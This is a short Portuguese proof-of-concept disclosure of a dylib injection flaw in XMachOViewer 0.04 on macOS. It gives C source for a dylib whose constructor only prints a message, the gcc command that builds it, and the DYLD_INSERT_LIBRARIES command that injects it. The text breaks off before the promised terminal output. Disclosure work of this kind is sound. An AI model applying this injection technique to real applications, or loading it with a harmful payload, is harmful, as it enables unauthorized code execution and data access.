
Exploit de prova de conceito para uma vulnerabilidade de injeção de dylib no XMachOViewer 0.04, demonstrando execução não autorizada de código via DYLD_INSERT_LIBRARIES no macOS.
Uma vulnerabilidade de injeção de dylib no XMachOViewer 0.04 permite que atacantes comprometam a integridade. Ao explorar isso, código não autorizado pode ser injetado nos processos do produto, potencialmente levando a controle remoto e acesso não autorizado a dados sensíveis do usuário.

Versão portátil para macOS
#include <syslog.h>
#include <stdio.h>
__attribute__((constructor))
static void poc(void)
{
printf("Malicious Dylib Inserted");
}
Compile
gcc -dynamiclib -arch x86_64 -o poc.dylib poc.c
E injete:
DYLD_INSERT_LIBRARIES=poc.dylib /Applications/XMachOViewer.app/Contents/MacOS/XMachOViewer
Isso abrirá o aplicativo e executará a dylib. Após fechar o aplicativo, veremos no terminal:
